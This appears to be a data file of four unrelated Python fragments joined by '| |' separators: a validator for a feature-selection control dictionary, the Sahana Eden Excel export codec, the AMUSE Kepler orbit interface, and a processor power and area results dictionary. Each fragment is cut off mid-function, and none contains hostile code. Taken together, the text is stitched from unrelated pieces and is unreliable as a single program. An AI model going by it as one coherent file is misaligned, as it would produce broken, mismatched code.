current_i += 1
if n_class == current_i:
self.logger.error("For ptype = 'quali', the target property has to be ordered by classes:")
self.logger.error("first all members of the first class, next all members of the next class ...")
sys.exit(1)
if not D_shape[1] == f_shape[0]:
self.logger.error(
'Length (%s) of feature_list has to match to number of columns (%s) of feature matrix.' %
(f_shape[0], D_shape[1]))
sys.exit(1)
if f_shape[0] < 2:
self.logger.error('Length of feature_list is %s. Choose at least two features.' % f_shape[0])
sys.exit(1)
if not isinstance(feature_unit_classes, (np.ndarray, list, type(None))):
raise TypeError("'feature_unit_classes' must be numpy array, list or None.")
if isinstance(feature_unit_classes, (np.ndarray, list)) and f_shape[0] != len(feature_unit_classes):
self.logger.error('Length of feature_unit_classes does not match length of feature_list.')
sys.exit(1)
feature_unit_classes_integers = [f for f in feature_unit_classes if isinstance(f, int)]
feature_unit_classes_strings = [f for f in feature_unit_classes if isinstance(f, str)]
if isinstance(feature_unit_classes, (np.ndarray, list)) and (not all(isinstance(f_c, int)
for f_c in feature_unit_classes_integers) or not all(f_c == 'no_unit' for f_c in feature_unit_classes_strings)):
raise TypeError("'feature_unit_classes' must consist of integers or the string 'no_unit', where each integer stands for the unit of a feature, i.e. 1:eV, 2:Angstrom. 'no_unit' is reserved for dimensionless unit.")
def check_control(self, par_in, par_ref, par_in_path):
""" Recursive Function to check input control dict tree.
If for example check_control(control,control_ref,'control')
function goes through dcit tree control and compares with control_ref
if correct keys (mandotory, not_mandotory, typos of key string) are set
and if values are of correct type or of optional list.
Furthermore it gives Errors with hints what is wrong, and what is needed.
Parameters
----------
par_in : any key
if par_in is dict, then recursion.
par_ref: any key
Is compared to par_in, if of same time.
If par_in and par_key are dict, alse keys are compared.
par_in_path: string
Gives the dict tree path where, when error occurs, e.g.
control[key_1][key_2]... For using function from outside
start with name of input dict, e.g. 'control'
"""
# check if value_in has correct type = value_ref_type
self.check_type(par_in, par_ref, par_in_path)
if isinstance(par_in, dict):
# check if correct keys are used
self.check_keys(par_in, par_ref, par_in_path)
for key_in, value_in in par_in.iteritems():
# get reference value like: dictionary[key_1][key_2] or here: par_ref[key_in]
# Needed because control_ref has special form.
value_ref = self.get_value_from_dic(par_ref, [key_in])
# recursion
self.check_control(value_in, value_ref, par_in_path + "['%s']" % key_in)
def get_type(self, value):
if isinstance(value, type):
return value
else:
return type(value)
def check_type(self, par_in, par_ref, par_in_path, if_also_none=False):
""" Check type of par_in and par_ref.
If par_ref is tuple, par_in must be item of par_ref:
else: they must have same type.
"""
# if par_ref is tuple, then only a few values are allowed. Thus just checked if
# par_in is in par_ref instead of checking type.
if isinstance(par_ref, tuple):
if not par_in in par_ref:
self.logger.error('%s must be in %s.' % (par_in_path, par_ref))
sys.exit(1)
# check if type(par_in) = type(par_ref)
else:
# get type of par_ref. type(par_ref) is not enough, since in control_ref
# strings,integers,dictionaries... AND types as <int>, <dict>, <str> are given.
ref_type = self.get_type(par_ref)
if not isinstance(par_in, ref_type):
if if_also_none and par_in is None:
pass
else:
self.logger.error('%s must be %s.' % (par_in_path, ref_type))
sys.exit(1)
def get_value_from_dic(self, dictionary, key_tree_path):
""" Returns value of the dict tree
Parameters
----------
dictionary: dict or 'dict tree' as control_ref
dict_tree is when key is tuple of keys and value is tuple of
corresponding values.
key_tree_path: list of keys
Must be in the correct order beginning from the top of the tree/dict.
# Examples
# --------
        # >>> print get_value_from_dic(control_ref, ['local_run','SIS_code_path'])
# <type 'str'>
"""
value_ref = dictionary
for key in key_tree_path:
value_ref_keys = value_ref.keys()
if key in value_ref_keys:
value_ref = value_ref[key]
else:
tuples = [tup for tup in value_ref_keys if isinstance(tup, tuple)]
try:
select_tuple = [tup for tup in tuples if key in tup][0]
except BaseException:
raise KeyError
index = [i for i, key_tuple in enumerate(select_tuple) if key == key_tuple][0]
value_ref = value_ref[select_tuple][index]
return value_ref
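    # Example (hypothetical input): for dictionary = {('a', 'b'): (1, 2)},
    # get_value_from_dic(dictionary, ['b']) matches the tuple key ('a', 'b'),
    # picks index 1 inside it and returns 2.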
def check_keys(self, par_in, par_ref, par_in_path):
""" Compares the dicts par_in and par_ref.
Collects which keys are missing (only if keys are not in not_mandotary) amd
whcih keys are not expected (if for example there is a typo).
If there are missing or not expected ones, error message with missing/not expected ones.
Parameters
----------
par_in : dict
par_ref : dict
par_in_path : string
Dictionary path string for error message, e.g 'control[key_1][key_2]'.
"""
keys_in, keys_ref = par_in.keys(), par_ref.keys()
# check if wrong keys are in keys_in
wrong_keys = [key for key in keys_in if not key in self.flatten(keys_ref)]
# check missing keys and if exactly one of optional keys is selected
missing_keys = []
for key in keys_ref:
if isinstance(key, tuple):
optional_in = [k for k in keys_in if k in key]
leng = len(optional_in)
if leng > 1:
self.logger.error("The following keys are set in %s: %s." % (par_in_path, optional_in))
self.logger.error("Please select only one of %s" % list(key))
sys.exit(1)
if leng == 0 and not key in not_mandotary:
missing_keys.append("--one of: (%s)" % (", ".join(["'%s'" % k for k in key])))
#missing_keys.append(('--one of:',)+key)
elif not key in keys_in and not key in not_mandotary:
missing_keys.append(key)
# error message if needed
len_wrong, len_missing = len(wrong_keys), len(missing_keys)
if len_wrong > 0 or len_missing > 0:
if len_wrong > 0:
self.logger.error("The following keys are not expected in %s: %s" % (par_in_path, wrong_keys))
if len_missing > 0:
self.logger.error("The following keys are missing in %s: %s" % (par_in_path, missing_keys))
sys.exit(1)
def check_OP_list(self, control):
""" Checks form and items of control['parameters']['OP_list'].
control['parameters']['OP_list'] must be a list of operations strings
or list of n_comb lists of operation strings. Furthermore if operation
strings are item of available_OPs | |
# -*- coding: utf-8 -*-
"""
S3 Microsoft Excel codec
@copyright: 2011-2021 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ("S3XLS",
)
from io import BytesIO
from gluon import HTTP, current
from gluon.contenttype import contenttype
from gluon.storage import Storage
from ..s3codec import S3Codec
from ..s3utils import s3_str, s3_strip_markup, s3_get_foreign_key
# =============================================================================
class S3XLS(S3Codec):
"""
Simple Microsoft Excel format codec
"""
# The xlwt library supports a maximum of 182 characters in a single cell
MAX_CELL_SIZE = 182
# Customizable styles
COL_WIDTH_MULTIPLIER = 310
# Python xlwt Colours
# https://docs.google.com/spreadsheets/d/1ihNaZcUh7961yU7db1-Db0lbws4NT24B7koY8v8GHNQ/pubhtml?gid=1072579560&single=true
LARGE_HEADER_COLOUR = 0x2C # pale_blue
HEADER_COLOUR = 0x2C # pale_blue
SUB_HEADER_COLOUR = 0x18 # periwinkle
SUB_TOTALS_COLOUR = 0x96
TOTALS_COLOUR = 0x00
ROW_ALTERNATING_COLOURS = [0x2A, # light_green
0x2B, # light_yellow
]
ERROR = Storage(
XLRD_ERROR = "XLS export requires python-xlrd module to be installed on server",
XLWT_ERROR = "XLS export requires python-xlwt module to be installed on server",
)
# -------------------------------------------------------------------------
def extract(self, resource, list_fields):
"""
Extract the rows from the resource
@param resource: the resource
@param list_fields: fields to include in list views
"""
title = self.crud_string(resource.tablename, "title_list")
get_vars = dict(current.request.vars)
get_vars["iColumns"] = len(list_fields)
query, orderby, left = resource.datatable_filter(list_fields,
get_vars,
)
resource.add_filter(query)
if orderby is None:
orderby = resource.get_config("orderby")
# Hierarchical FK Expansion:
# setting = {field_selector: [LevelLabel, LevelLabel, ...]}
expand_hierarchy = resource.get_config("xls_expand_hierarchy")
data = resource.select(list_fields,
left = left,
limit = None,
count = True,
getids = True,
orderby = orderby,
represent = True,
show_links = False,
raw_data = True if expand_hierarchy else False,
)
rfields = data.rfields
rows = data.rows
types = []
lfields = []
heading = {}
for rfield in rfields:
if rfield.show:
if expand_hierarchy:
levels = expand_hierarchy.get(rfield.selector)
else:
levels = None
if levels:
num_levels = len(levels)
colnames = self.expand_hierarchy(rfield, num_levels, rows)
lfields.extend(colnames)
types.extend(["string"] * num_levels)
T = current.T
for i, colname in enumerate(colnames):
heading[colname] = T(levels[i])
else:
lfields.append(rfield.colname)
heading[rfield.colname] = rfield.label or \
rfield.field.name.capitalize().replace("_", " ")
if rfield.ftype == "virtual":
types.append("string")
else:
types.append(rfield.ftype)
return (title, types, lfields, heading, rows)
# -------------------------------------------------------------------------
def encode(self, resource, **attr):
"""
Export data as a Microsoft Excel spreadsheet
@param resource: the source of the data that is to be encoded
as a spreadsheet, can be either of:
1) an S3Resource
2) an array of value dicts (dict of
column labels as first item, list of
field types as second item)
3) a dict like:
{columns: [key, ...],
headers: {key: label},
types: {key: type},
rows: [{key:value}],
}
@param attr: keyword arguments (see below)
@keyword as_stream: return the buffer (BytesIO) rather than
its contents (str), useful when the output
is supposed to be stored locally
@keyword title: the main title of the report
@keyword list_fields: fields to include in list views
@keyword report_groupby: used to create a grouping of the result:
either a Field object of the resource
or a string which matches a value in
the heading
@keyword use_colour: True to add colour to the cells, default False
@keyword evenodd: render different background colours
for even/odd rows ("stripes")
"""
# Do not redirect from here!
# ...but raise proper status code, which can be caught by caller
try:
import xlwt
except ImportError:
error = self.ERROR.XLWT_ERROR
current.log.error(error)
raise HTTP(503, body=error)
try:
from xlrd.xldate import xldate_from_date_tuple, \
xldate_from_time_tuple, \
xldate_from_datetime_tuple
except ImportError:
error = self.ERROR.XLRD_ERROR
current.log.error(error)
raise HTTP(503, body=error)
import datetime
MAX_CELL_SIZE = self.MAX_CELL_SIZE
COL_WIDTH_MULTIPLIER = self.COL_WIDTH_MULTIPLIER
# Get the attributes
attr_get = attr.get
title = attr_get("title")
if title is None:
title = current.T("Report")
list_fields = attr_get("list_fields")
group = attr_get("dt_group")
use_colour = attr_get("use_colour", False)
evenodd = attr_get("evenodd", True)
# Extract the data from the resource
if isinstance(resource, dict):
headers = resource.get("headers", {})
lfields = resource.get("columns", list_fields)
column_types = resource.get("types")
types = [column_types[col] for col in lfields]
rows = resource.get("rows")
elif isinstance(resource, (list, tuple)):
headers = resource[0]
types = resource[1]
rows = resource[2:]
lfields = list_fields
else:
if not list_fields:
list_fields = resource.list_fields()
(title, types, lfields, headers, rows) = self.extract(resource,
list_fields,
)
# Verify columns in items
request = current.request
if len(rows) > 0 and len(lfields) > len(rows[0]):
msg = """modules/s3/codecs/xls: There is an error in the list items, a field doesn't exist
requesting url %s
Headers = %d, Data Items = %d
Headers %s
List Fields %s""" % (request.url, len(lfields), len(rows[0]), headers, lfields)
current.log.error(msg)
# Grouping
report_groupby = lfields[group] if group else None
groupby_label = headers[report_groupby] if report_groupby else None
# Date/Time formats from L10N deployment settings
settings = current.deployment_settings
date_format = settings.get_L10n_date_format()
date_format_str = str(date_format)
dt_format_translate = self.dt_format_translate
date_format = dt_format_translate(date_format)
time_format = dt_format_translate(settings.get_L10n_time_format())
datetime_format = dt_format_translate(settings.get_L10n_datetime_format())
title_row = settings.get_xls_title_row()
# Get styles
styles = self._styles(use_colour = use_colour,
evenodd = evenodd,
datetime_format = datetime_format,
)
# Create the workbook
book = xlwt.Workbook(encoding = "utf-8")
# Add sheets
sheets = []
# XLS exports are limited to 65536 rows per sheet, we bypass
# this by creating multiple sheets
row_limit = 65536
sheetnum = len(rows) / row_limit
# Can't have a / in the sheet_name, so replace any with a space
sheet_name = s3_str(title.replace("/", " "))
if len(sheet_name) > 28:
# Sheet name cannot be over 31 chars
# (take sheet number suffix into account)
sheet_name = sheet_name[:28]
count = 1
while len(sheets) <= sheetnum:
sheets.append(book.add_sheet("%s-%s" % (sheet_name, count)))
count += 1
if callable(title_row):
# Calling with sheet None to get the number of title rows
title_row_length = title_row(None)
else:
title_row_length = 2
# Add header row to all sheets, determine columns widths
header_style = styles["header"]
for sheet in sheets:
# Move this down if a title row will be added
if title_row:
header_row = sheet.row(title_row_length)
else:
header_row = sheet.row(0)
column_widths = []
has_id = False
col_index = 0
for selector in lfields:
if selector == report_groupby:
continue
label = headers[selector]
if label == "Id":
# Indicate to adjust col_index when writing out
has_id = True
column_widths.append(0)
col_index += 1
continue
if label == "Sort":
continue
if has_id:
# Adjust for the skipped column
write_col_index = col_index - 1
else:
write_col_index = col_index
header_row.write(write_col_index, str(label), header_style)
width = max(len(label) * COL_WIDTH_MULTIPLIER, 2000)
width = min(width, 65535) # USHRT_MAX
column_widths.append(width)
sheet.col(write_col_index).width = width
col_index += 1
title = s3_str(title)
# Title row (optional, deployment setting)
if title_row:
T = current.T
large_header_style = styles["large_header"]
notes_style = styles["notes"]
for sheet in sheets:
if callable(title_row):
# Custom title rows
title_row(sheet)
else:
# First row => Title (standard = "title_list" CRUD string)
current_row = sheet.row(0)
if col_index > 0:
sheet.write_merge(0, 0, 0, col_index,
title,
large_header_style,
)
current_row.height = 500
# Second row => Export date/time
current_row = sheet.row(1)
current_row.write(0, "%s:" % T("Date Exported"), notes_style)
current_row.write(1, request.now, notes_style)
# Fix the size of the last column to display the date
if 16 * COL_WIDTH_MULTIPLIER > width:
sheet.col(col_index).width = 16 * COL_WIDTH_MULTIPLIER
# Initialize counters
total_cols = col_index
# Move the rows down if a title row is included
if title_row:
row_index = title_row_length
else:
row_index = 0
# Helper function to get the current row
def get_current_row(row_count, row_limit):
sheet_count = int(row_count / row_limit)
| |
<filename>src/amuse/community/kepler/interface.py
from amuse.community import *
from amuse.community.interface.common import CommonCodeInterface, CommonCode
from amuse.support.options import option
from amuse.units import units
import os.path
class KeplerInterface(CodeInterface,
CommonCodeInterface):
"""
Kepler orbit manipulation functions, imported from Starlab.
Initialize an orbit from mass, pos, and vel, or mass, semi-major
axis and eccentricity, and allow the user to manipulate the
resulting structure. Most Starlab functionality is currently
exposed.
"""
# Interface specification.
include_headers = ['interface.h']
__so_module__ = 'kepler_cython'
def __init__(self, **options):
CodeInterface.__init__(self,
name_of_the_worker = "kepler_worker",
**options)
@legacy_function
def initialize_from_dyn():
"""
Initialize a new kepler system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('mass', dtype='float64', direction=function.IN,
unit = nbody_system.mass)
function.addParameter('x', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.addParameter('y', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.addParameter('z', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.addParameter('vx', dtype='float64', direction=function.IN,
unit = nbody_system.speed)
function.addParameter('vy', dtype='float64', direction=function.IN,
unit = nbody_system.speed)
function.addParameter('vz', dtype='float64', direction=function.IN,
unit = nbody_system.speed)
function.addParameter('time', dtype='float64', direction=function.IN,
default = 0, unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
new kepler was created
-1 - ERROR
kepler could not be created"""
return function
@legacy_function
def initialize_from_elements():
"""
Initialize a new kepler system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('mass', dtype='float64', direction=function.IN,
unit = nbody_system.mass)
function.addParameter('semi', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.addParameter('ecc', dtype='float64', direction=function.IN,
unit = NO_UNIT)
function.addParameter('mean_anomaly',
dtype='float64', direction=function.IN,
default = 0, unit = NO_UNIT)
function.addParameter('time', dtype='float64', direction=function.IN,
default = 0, unit = nbody_system.time)
function.addParameter('periastron',
dtype='float64', direction=function.IN,
default = 0, unit = nbody_system.length)
function.addParameter('random_orientation',
dtype='int32', direction=function.IN,
default = 0, unit = NO_UNIT)
function.result_type = 'int32'
function.result_doc = """
0 - OK
new kepler was created
-1 - ERROR
kepler could not be created"""
return function
@legacy_function
def transform_to_time():
"""
Transform the kepler system to the specified time.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('time', dtype='float64', direction=function.IN,
unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
transform to time OK
-1 - ERROR
could not transform to time"""
return function
@legacy_function
def advance_to_radius():
"""
Evolve the kepler system forward in time to the specified radius.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('radius', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
advance to radius OK
-1 - ERROR
could not advance to radius"""
return function
@legacy_function
def return_to_radius():
"""
Evolve the kepler system backward in time to the specified radius.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('radius', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
return to radius OK
-1 - ERROR
could not return to radius"""
return function
@legacy_function
def advance_to_periastron():
"""
Evolve the kepler system forward in time to the next periastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
advance to periastron OK
-1 - ERROR
could not advance to periastron"""
return function
@legacy_function
def advance_to_apastron():
"""
Evolve the kepler system forward in time to the next apastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
advance to apastron OK
-1 - ERROR
could not advance to apastron"""
return function
@legacy_function
def return_to_periastron():
"""
Evolve the kepler system backward in time to the previous periastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
return to periastron OK
-1 - ERROR
could not return to periastron"""
return function
@legacy_function
def return_to_apastron():
"""
Evolve the kepler system backward in time to the previous apastron.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.result_type = 'int32'
function.result_doc = """
0 - OK
return to apastron OK
-1 - ERROR
could not return to apastron"""
return function
@legacy_function
def get_total_mass():
"""
Return the total mass (remind the user) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('mass', dtype='float64', direction=function.OUT,
unit = nbody_system.mass)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get mass OK
-1 - ERROR
could not get mass"""
return function
@legacy_function
def get_time():
"""
Return the current time of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('time', dtype='float64', direction=function.OUT,
unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get time OK
-1 - ERROR
could not get time"""
return function
@legacy_function
def get_period():
"""
        Return the period of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('period', dtype='float64', direction=function.OUT,
unit = nbody_system.time)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get period OK
-1 - ERROR
could not get period"""
return function
@legacy_function
def get_elements():
"""
Return the orbital elements (a,e) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('semi', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.addParameter('ecc', dtype='float64', direction=function.OUT,
unit = NO_UNIT)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get elements OK
-1 - ERROR
could not get elements"""
return function
@legacy_function
def get_integrals():
"""
Return the total energy and angular momentum of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('energy', dtype='float64', direction=function.OUT,
unit = nbody_system.speed*nbody_system.speed)
function.addParameter('angular_momentum',
dtype='float64', direction=function.OUT,
unit = nbody_system.length*nbody_system.speed)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get integrals OK
-1 - ERROR
could not get integrals"""
return function
@legacy_function
def get_separation_vector():
"""
Return the current separation vector (x,y,z) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('x', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.addParameter('y', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.addParameter('z', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get separation vector OK
-1 - ERROR
could not get separation vector"""
return function
@legacy_function
def get_separation():
"""
Return the current separation r of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('r', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get separation OK
-1 - ERROR
could not get separation"""
return function
@legacy_function
def set_periastron():
"""
Set the current periastron of the system (initialization only).
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('peri', dtype='float64', direction=function.IN,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
set periastron OK
-1 - ERROR
could not set periastron"""
return function
@legacy_function
def get_periastron():
"""
Return the current periastron of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('peri', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get periastron OK
-1 - ERROR
could not get periastron"""
return function
@legacy_function
def get_apastron():
"""
Return the current apastron of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('apo', dtype='float64', direction=function.OUT,
unit = nbody_system.length)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get apastron OK
-1 - ERROR
could not get apastron"""
return function
@legacy_function
def get_velocity_vector():
"""
Return the current relative velocity vector (x,y,z) of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('vx', dtype='float64', direction=function.OUT,
unit = nbody_system.speed)
function.addParameter('vy', dtype='float64', direction=function.OUT,
unit = nbody_system.speed)
function.addParameter('vz', dtype='float64', direction=function.OUT,
unit = nbody_system.speed)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get velocity vector OK
-1 - ERROR
could not get velocity vector"""
return function
@legacy_function
def get_angles():
"""
Return the current mean and true anomalies of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('true_anomaly',
dtype='float64', direction=function.OUT)
function.addParameter('mean_anomaly',
dtype='float64', direction=function.OUT)
function.result_type = 'int32'
function.result_doc = """
0 - OK
get angles OK
-1 - ERROR
could not get angles"""
return function
@legacy_function
def set_longitudinal_unit_vector():
"""
Set the longitudinal unit vector of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('vx', dtype='float64', direction=function.IN)
function.addParameter('vy', dtype='float64', direction=function.IN)
function.addParameter('vz', dtype='float64', direction=function.IN)
function.result_type = 'int32'
function.result_doc = """
0 - OK
set vector OK
-1 - ERROR
could not set vector"""
return function
@legacy_function
def set_normal_unit_vector():
"""
Set the normal unit vector of the system.
"""
function = LegacyFunctionSpecification()
function.can_handle_array = False
function.addParameter('vx', dtype='float64', direction=function.IN)
function.addParameter('vy', dtype='float64', direction=function.IN)
function.addParameter('vz', dtype='float64', direction=function.IN)
function.result_type = 'int32'
function.result_doc = """
0 - OK
set vector OK
-1 - ERROR
could not set | |
0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.173353,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.23654,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.02398,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.221524,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.163822,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.166994,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.269355,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.135961,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.572309,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.165877,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.41642,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0309496,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00700447,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0582336,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0518023,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0891831,
'Execution Unit/Register Files/Runtime Dynamic': 0.0588068,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.128678,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.330941,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.58896,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00166267,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
